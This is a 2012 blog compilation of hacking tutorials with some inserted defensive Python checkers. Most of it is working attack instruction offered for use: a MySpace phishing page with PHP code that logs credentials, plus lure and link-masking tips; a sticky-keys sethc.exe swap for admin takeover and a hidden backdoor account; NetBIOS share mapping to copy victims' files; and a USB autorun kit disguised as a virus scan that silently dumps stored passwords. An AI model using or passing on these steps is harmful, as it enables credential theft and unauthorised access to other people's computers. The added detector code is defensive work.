Thursday, 11 October 2012

How to make Mozilla Firefox 30 times faster


1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.

Name it "nglayout.initialpaint.delay" and set its value to "0".

This value is the amount of time the browser waits before it acts on information it
receives.

If you're using a broadband connection you'll load pages 2-30 times faster now.

How to make a phisher for a website



1. Intro
There are a couple of other phishing tutorials around here, but some people seem to
have problems understanding them. So I'll try to be as simple as possible, and if you
have problems understanding it, then you need to get some beginner level computer
knowledge first.
-This article was written for educational purpose only. I'm not responsible for any
illegal activity that you may commit.
2. What is a phisher?
A phisher is something that looks like a login page (a fake login page), that writes the
username and the password to a file, or does whatever you want.
3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we
will make a phishing site for Myspace(the procedure is equivalent for most of the
sites). While not signed in myspace, open anyone's profile and click on his picture.
That will lead you to Myspace's login page that has the red box with"You Must Be
Logged-In to do That!" just above your login form. Now, click File>Save Page As, and
save the myspace page to your Desktop. Open your saved page with any text
editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source
code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the
same function as if it were on the original site. The link to your phish site will be
'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and
press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging
them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in
button, search button, etc.). We need to find the 'action=some link' that refers to
the Login button.
After some searching, we find the:
<h5 class="heading">
            Member Login
        </h5>
        <form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYW
NrS2V5X18WAgUwY3RsMDAkT
WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGw
wMCRNYWluJFNwbGFzaERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24="
/>
</div>
and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the
'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in
password boxes, and execute the functions in the 'login.php' file on your site(which
doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code
in it:
<?php
header ('Location: http://myspace.com ');
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passes.txt' (and creates it
if it doesn't already exist) and enters the information there (the username and
password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and
passes.txt. but the .php and .txt must stay the same.
4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
The most common way is to make an email similar to the admin's, and send them some
report with a link to log in to the site (your phish site). Of course you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing
this:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]
For example, www.google.com looks like a google, but it leads you to yahoo when you
click it.
If you're making the phisher for myspace, and want to get random ppl to it, you can
simply make some hot chick account and put some hot pic that will lead to your phish
site when clicked. So when they click the lusty image, they will be led to your phish
site telling them they need to log in to see that.
Like this:
[url=YourPhishSiteLink][img]link of the image[/img][/url]
When sending emails see for the option 'hyperlink', and it's self explainable once you
see it.
There are many other ways, and as I said, your creativity is the limit.
5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a
phisher, and how it works. Although it is written for Myspace, the procedure is
equivalent for almost every other login site (for hotmail it is different). After this, it's
up to you to explore, experiment and dive in the world of social engineering.
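
Seen from the defending side, the two tricks this tutorial relies on are both checkable: a login form whose action no longer posts to the real site's HTTPS origin, and a BBCode link whose visible text names a different host than its target. The following is an added example, not part of the original post; the function names and the sample HTML and BBCode are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormCollector(HTMLParser):
    """Collect every <form> and note whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_login_forms(html, page_url, trusted_hosts):
    """Return the resolved action URL of every password form that does not
    post over HTTPS to one of trusted_hosts."""
    parser = FormCollector()
    parser.feed(html)
    flagged = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # A relative action such as "login.php" resolves against the page itself.
        target = urlparse(urljoin(page_url, form["action"]))
        host = (target.hostname or "").lower()
        if target.scheme != "https" or host not in trusted_hosts:
            flagged.append(target.geturl())
    return flagged


_BB_URL = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)
_HOSTLIKE = re.compile(r"^(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.IGNORECASE)


def _host(text):
    match = _HOSTLIKE.match(text.strip().strip('"'))
    return match.group(1).lower() if match else None


def masked_bbcode_links(post):
    """Return (shown_host, real_host) for each [url=...] tag whose visible
    text looks like a URL on a different host than the real target."""
    hits = []
    for target, label in _BB_URL.findall(post):
        shown, real = _host(label), _host(target)
        if shown and real and shown != real:
            hits.append((shown, real))
    return hits


# Constructed samples: a copied login page with the rewritten action,
# the same form posting to the genuine origin, and a forum post.
SAMPLE_PHISH = """<form action="login.php" method="post" id="LoginForm">
<input type="text" name="email"><input type="password" name="password" />
</form>
<form action="/search" method="get"><input type="text" name="q"></form>"""

SAMPLE_GENUINE = """<form method="post"
 action="https://secure.myspace.com/index.cfm?fuseaction=login.process">
<input type="password" name="password"></form>"""

SAMPLE_POST = ("[url=http://xxx.t35.com/index.php]www.myspace.com[/url] "
               "[url=http://www.google.com]www.google.com[/url] "
               "[url=http://xxx.t35.com/index.php][img]http://img.example/p.jpg[/img][/url]")

if __name__ == "__main__":
    trusted = {"secure.myspace.com"}
    print(suspicious_login_forms(SAMPLE_PHISH, "http://xxx.t35.com/index.php", trusted))
    print(suspicious_login_forms(SAMPLE_GENUINE, "https://secure.myspace.com/", trusted))
    print(masked_bbcode_links(SAMPLE_POST))
```

The image-wrapped link is not reported by the host comparison because its label is not URL-like; a forum filter would treat off-site image links as a separate rule.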

-: Folder Lock Without Any Software :-

   


Folder Lock With Password Without Any Software-

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.

If you want to unlock your files, double click the batch file again and you would be prompted for
password.

Enter the password and enjoy access to the folder.

REM Note: this script only renames and hides the folder. Nothing is encrypted,
REM and the password below is stored in plain text inside this batch file.
REM Replace "type your password here" with your own password before saving.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if "%cho%"=="Y" goto LOCK
if "%cho%"=="y" goto LOCK
if "%cho%"=="n" goto END
if "%cho%"=="N" goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT "%pass%"=="type your password here" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

How to kick someone off a wireless network




Step 1: Open cmd.

Step 2: Write shutdown -i

Step 3: Choose a Victim from the list

Step 4: Choose to shutdown their computer

Step 5: Make the warning pop up 1 sec before shutting down.

Step 6: Click Ok.

Done! :)

How To Kick Everyone From A Counter Strike Source Server




INSTRUCTIONS:

1. Place Buffer1.cfg and Buffer2.cfg in your cfg folder. If it doesn't exist, make it
(see below)

(Commonly C:\User\program files\steam\steamapps\Account name\counter-strike
source\cstrike\cfg)

2. Go in game, open the developer's console, and type in the following (you may change
bind key):

Bind M "wait;exec Buffer1;exec Buffer2"

(If developer's console doesn't open, go to options, keyboard, advanced, enable
developer's console)

3. Go in game and rapidly hit the M key to crash the server. Depending on how fast
you hit it, it should take anywhere from 15-30 seconds to crash. Don't stop hitting the key until you get a
message:

"Client # has overflowed reliable channel."

Or check:           G:\X-file\Stuff\Buffer Overflow.rar

How to hide files in a jpg



Set up:

1. Must have a .zip or .rar compressor.

2. Willingness to learn.
Steps:

1. Save the picture of choice to your desktop.

2. Make a new .rar or .zip folder on your desktop.

3. Add the files you want to hide into the .zip or .rar

4. Click start menu, run, cmd.

5. In Command Prompt type cd "desktop" with the quotation marks.

6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg

( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)

7. Now there should be the outputted file name with a .jpg extension on the desktop.

( Do not close Command Prompt just yet )

8. Double click it to open the picture and check it out.

9. When you're done looking, and want to view the hidden files

Type: ren outputfilename.jpg outputfilename.rar  or zip

Now you're done!

A quick info-fact:

With this technique of hiding files in a jpg you can send this to anyone and they just
have to rename the file extension to .zip or .rar.

With this technique the Al-Qaeda operatives were able to send info to others
secretively.
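
The trick works because image viewers stop at the JPEG end-of-image marker while archive tools look for their own signatures, so the appended archive can be found by walking the JPEG markers and checking what follows the end. The detector below is an added example, not part of the original post; the function names and the sample bytes (a minimal marker stream, not a viewable picture) are constructed for illustration.

```python
import io
import zipfile

# Signatures that may follow the image when an archive has been appended.
ARCHIVE_MAGIC = {
    b"PK\x03\x04": "zip",
    b"PK\x05\x06": "zip (empty)",
    b"Rar!\x1a\x07": "rar",
}

# Markers that carry no length field: stuffed byte, TEM, RST0-7, SOI.
_NO_LENGTH = {0x00, 0x01, 0xD8} | set(range(0xD0, 0xD8))


def jpeg_end_offset(data):
    """Return the offset just past the real EOI marker, or None if data is
    not a complete JPEG marker stream. Segments are skipped by their length
    field, so an FFD9 inside an embedded thumbnail is not mistaken for the end."""
    if data[:2] != b"\xff\xd8":
        return None
    i, n = 2, len(data)
    while i + 1 < n:
        if data[i] != 0xFF:
            i += 1                      # entropy-coded image data
            continue
        marker = data[i + 1]
        if marker == 0xD9:              # EOI
            return i + 2
        if marker == 0xFF:              # fill byte before a marker
            i += 1
            continue
        if marker in _NO_LENGTH:
            i += 2
            continue
        if i + 4 > n:
            return None
        seg_len = int.from_bytes(data[i + 2:i + 4], "big")
        if seg_len < 2:
            return None
        i += 2 + seg_len                # marker + length-prefixed payload
    return None


def find_appended_archive(data):
    """Return details about bytes that follow the image, or None when the
    input is not a JPEG or nothing is appended."""
    end = jpeg_end_offset(data)
    if end is None or end == len(data):
        return None
    trailer = data[end:]
    kind, offset = "unknown", None
    for magic, name in ARCHIVE_MAGIC.items():
        pos = trailer.find(magic)
        if pos != -1 and (offset is None or end + pos < offset):
            kind, offset = name, end + pos
    return {"jpeg_end": end, "trailing_bytes": len(trailer),
            "kind": kind, "archive_offset": offset}


def sample_jpeg():
    """Constructed marker stream: SOI, APP0, APP1 holding a fake thumbnail
    (with its own FFD8/FFD9), SOS header, a few data bytes, EOI."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app1 = b"\xff\xe1" + (12).to_bytes(2, "big") + b"Exif\x00\x00" + b"\xff\xd8\xff\xd9"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    return b"\xff\xd8" + app0 + app1 + sos + b"\x12\x34\xff\x00\x56" + b"\xff\xd9"


def build_sample_polyglot():
    """Equivalent of 'copy /b picture.jpg + archive.zip out.jpg' on constructed data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "constructed sample payload")
    return sample_jpeg() + buf.getvalue()


if __name__ == "__main__":
    print(find_appended_archive(sample_jpeg()))
    print(find_appended_archive(build_sample_polyglot()))
```

Re-encoding uploaded images on the server, rather than storing the received bytes, discards anything after the end-of-image marker.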

Tuesday, 9 October 2012

How to grab IP address with PHP


Today I’ll be showing you how to grab somebody's IP address when they visit a page.
The variable to use is $_SERVER['REMOTE_ADDR'] - It’s that simple. You can use it
for just about anything, here are a few examples.

Printing the User's IP Address:

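<?php
// REMOTE_ADDR is the peer address of the TCP connection; behind a proxy or
// load balancer it is the proxy's address, not the visitor's.
print($_SERVER['REMOTE_ADDR'] . " I'm Watching You!");
?>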

Printing it to a File:
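<?php
$ip = $_SERVER['REMOTE_ADDR'];
// Open in append mode. Keep the log outside the web root, otherwise
// anyone who guesses the file name can download it.
$handle = fopen('ipaddresses.txt', 'a+');
fwrite($handle, $ip);
fwrite($handle, "\n");
fclose($handle);
?>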

All you have to do, is to make a text file and insert any of these codes or one of your
own and save it as anythingyouwant.php

Then upload it to your website and it'll do the trick :P

The possibilities for what you can use this for are endless.

Good luck :D

How To Hack An Administrator Account With A Guest Account


(The only way this is going to work is if your account has permission to modify files in folder
«system32»)

Ever wanted to hack your college pc with guest account/student account so that you
can download with full speed there? Or just wanted to hack
your friend’s pc to make him gawk when you tell your success story of hacking?
Well, there is a great way of hacking an administrator account from a guest account by
which you can reset the administrator password and get all the privileges an
administrator enjoys on Windows. Interested? Read on…

Concept

Press shift key 5 times and the sticky key dialog shows up. This works even at the
logon screen. But if we replace the sethc.exe which is responsible for the sticky key
dialog with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon
screen, we will get a command prompt with administrator privileges because no user
has logged on. From there we can hack the administrator password, even from a guest
account.

Prerequisites
Guest account with write access to system 32.

Here is how to do that -
* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe

* Copy the new sethc.exe to system 32,when windows asks for overwriting the
file,then click yes.

When asked to overwrite, overwrite the sethc.exe.

* Now Log out from your guest account and at the user select window,press shift key
5 times.

* Instead of Sticky Key confirmation dialog,command prompt with full administrator
privileges will open.

Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password
you like and press enter.

* You will see “ The Command completed successfully” and then exit the command
prompt and login into administrator with your new password.

* Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)
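
The prerequisite stated at the top (a low-privileged account that can write to system32) is the actual weakness, and the swap itself is easy to detect afterwards: sethc.exe becomes byte-identical to cmd.exe. The audit below is an added example, not part of the original post; the function names, the optional baseline argument and the stand-in files are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path, chunk=65536):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def audit_sticky_keys(system32, baseline=None, watched=("sethc.exe",), shells=("cmd.exe",)):
    """Return (file_name, reason) findings for a system32 directory.

    A watched file is reported when it is missing, when its content equals
    one of the shell binaries, or when it differs from a known-good hash
    supplied in baseline ({file_name: sha256 hex})."""
    root = Path(system32)
    baseline = baseline or {}

    # Hash the shells once so each watched file needs only one comparison.
    shell_hashes = {}
    for name in shells:
        candidate = root / name
        if candidate.is_file():
            shell_hashes[sha256_file(candidate)] = name

    findings = []
    for name in watched:
        target = root / name
        if not target.is_file():
            findings.append((name, "missing"))
            continue
        digest = sha256_file(target)
        if digest in shell_hashes:
            findings.append((name, f"identical to {shell_hashes[digest]}"))
        elif name in baseline and baseline[name] != digest:
            findings.append((name, "differs from baseline"))
    return findings


def make_demo_dir(tampered):
    """Build a throw-away directory holding constructed stand-in files
    (plain bytes, not real Windows binaries) and return its path."""
    root = Path(tempfile.mkdtemp(prefix="system32-demo-"))
    shell_bytes = b"MZ constructed stand-in for cmd.exe"
    (root / "cmd.exe").write_bytes(shell_bytes)
    original = b"MZ constructed stand-in for sethc.exe"
    (root / "sethc.exe").write_bytes(shell_bytes if tampered else original)
    return str(root)


if __name__ == "__main__":
    print(audit_sticky_keys(make_demo_dir(tampered=False)))
    print(audit_sticky_keys(make_demo_dir(tampered=True)))
```

On a real machine, point the function at the Windows system32 directory and supply baseline hashes from a known-good image of the same build.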

How To Hack Into A Computer On LAN


NetBIOS Hacking

-What is it?-

NetBIOS Hacking is the art of hacking into someone else’s computer through your
computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for
a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-

Most people don’t even know, but when they’re on a LAN or WAN they could possibly
have their entire hard drive shared and not even know. So if we can find a way into
the network, their computer is at our disposal.

-What do I need?-

Windows OS

Cain and Abel (oxid.it - Home)
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
So first off we need to find a computer or the computer to hack into. So if you're
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses
in the local subnet. Once you have opened up the program click on the sniffer tab,
click the Start/Stop sniffer, and then click the blue cross
Another window will pop up, make sure “All host in my subnet” is selected, and then
click ok.

It should begin to scan.

Then IP’s, computer names, and mac addresses will show up.

Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.

If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.

Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.

From here we will do most of the hacking.

Now I will be referring to certain commands that need to be inputted into the
command prompt.

I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.

I am only doing this to avoid confusion.
Let’s get back to the hacking.

Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”

This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
information):

IF it didn’t work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
Now, input this command “nbtstat -a (IP address of target).” An example would be
“nbtstat -a 192.168.1.103.”

This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name. 

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually
very important, without this, the hack would not work. So, let me break it down from
the top to bottom. I will just give the first line of information, and then explain the
paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this
information tells us about our connection through the LAN, and in my case, I am not
connected through LAN, so the host is not found, and there is no IP.
The information right below the “Local Area Connection,” is “Wireless Network
Connection 2:” It gives us information about the connection to the target through
WAN. In my case I am connected through the WAN, so it was able to find the Node
IpAddress. The Node IpAddress is the local area IP of the computer you are going to
break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer,
tells us if it is shared, and gives us the computer name. Sometimes it will even give us
the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the
computer I am trying to connect to. If you look to the right you should see a <20>.
This means that file sharing is enabled on BATGIRL. If there was not a <20> to the
right of the Name, then you have reached a dead end and need to go find another IP,
or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you
are confused about which one is the workgroup, and the computer, look under the
Type category to the right of the < > for every Name. If it says UNIQUE, it is one
system, such as a printer or computer. If it is GROUP, then it is the workgroup
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
Finally it’s time.

By now we know: that our target is online, our target has file sharing, and our target’s
computer name.

So it’s time to break in.

We will now locate the shared drives, folders, files, or printers. Type in “net view \\
(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”
We have just found our share name. In this case, under the share name is “C,”
meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.

All that is left to do is “map” the shared drive onto our computer. This means that
we will make a drive on our computer, and all the contents of the targets computer
can be accessed through our created network drive. Type in “net use K: \\(IP
Address of Target)\(Shared Drive). For my example in this tutorial, “net use
K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different
person, do u see the “K after “net use?” This is the letter of the drive that you are
making on your computer. It can be any letter you wish, as long as the same letter is
not in use by your computer. So it could be “net use G...,” for a different target.
As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.

If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace your steps.

Now open up “my computer” under the start menu, and your newly created network
drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.

The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.

So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
Congratulations! You’re DONE!

-Commands used in this tutorial:
PING

NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)

-Program used in this tutorial:
Cain and Abel

How to hack passwords using USB Drive

 
Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc. 

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exist many tools for recovering these passwords from their stored places.
Using these tools and a USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer. 

We need the following tools to create our rootkit: 

MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename. 

------------------------------------------------------------------------------------------------
Here is a step by step procedure to create the password hacking toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.

2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan 

save the Notepad and rename it from 

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.
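
A removable drive prepared this way is recognisable before anything on it is run: its autorun.inf launches a script, and that script starts several executables with the /stext option to write their results to text files. The inspection below is an added example, not part of the original post; the function names and finding labels are constructed, and the two sample files are the ones shown in the steps above.

```python
import configparser
import re

RUNNABLE = (".bat", ".cmd", ".exe", ".com", ".scr", ".vbs", ".js", ".pif")
LAUNCH_KEYS = ("open", "shellexecute")

# "start tool.exe /stext out.txt": a tool told to save its results to a file.
_STEXT = re.compile(r"^\s*(?:start\s+)?(\S+\.exe)\s+/stext\s+(\S+)", re.IGNORECASE)


def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys,
    or an empty dict when the text has no such section."""
    parser = configparser.ConfigParser(strict=False, interpolation=None,
                                       allow_no_value=True)
    try:
        parser.read_string(text)
    except configparser.Error:
        return {}
    for section in parser.sections():
        if section.strip().lower() == "autorun":
            return {key.lower(): (value or "").strip()
                    for key, value in parser.items(section)}
    return {}


def inspect_drive(files):
    """files maps file name -> text content for the root of a removable drive.
    Returns a list of (kind, detail) findings."""
    lookup = {name.lower(): body for name, body in files.items()}
    autorun = parse_autorun(lookup.get("autorun.inf", ""))
    findings = []

    launches = [(key, value) for key, value in autorun.items()
                if value and (key in LAUNCH_KEYS or key.endswith("\\command"))]
    for key, value in launches:
        target = value.split()[0].strip('"').lower()
        if target.endswith(RUNNABLE):
            findings.append(("autorun-launch", f"{key}={value}"))
        # Follow the launch into a batch file that is present on the drive.
        body = lookup.get(target)
        if body is not None and target.endswith((".bat", ".cmd")):
            for line in body.splitlines():
                match = _STEXT.match(line)
                if match:
                    findings.append(("silent-dump",
                                     f"{match.group(1)} -> {match.group(2)}"))

    # The action text is chosen by whoever prepared the drive, so report it
    # next to the command it actually triggers.
    if launches and autorun.get("action"):
        findings.append(("autorun-label", autorun["action"]))
    return findings


# The two files from the steps above, embedded as sample input.
SAMPLE_DRIVE = {
    "autorun.inf": "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan \n",
    "launch.bat": ("start mspass.exe /stext mspass.txt\n"
                   "start mailpv.exe /stext mailpv.txt\n"
                   "start iepv.exe /stext iepv.txt\n"
                   "start pspv.exe /stext pspv.txt\n"
                   "start passwordfox.exe /stext passwordfox.txt\n"),
}

if __name__ == "__main__":
    for kind, detail in inspect_drive(SAMPLE_DRIVE):
        print(f"{kind:15} {detail}")
```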

How to hack someone with his IP address


Introduction

1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document
will teach you some simple things about NETBIOS, what it does, how to use it, how to
hack with it, and some other simple DOS commands that will be useful to you in the
future.

1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC.
It is responsible for starting up your computer, transferring control of the system to
your operating system, and for handling other low-level functions, such as disk access.
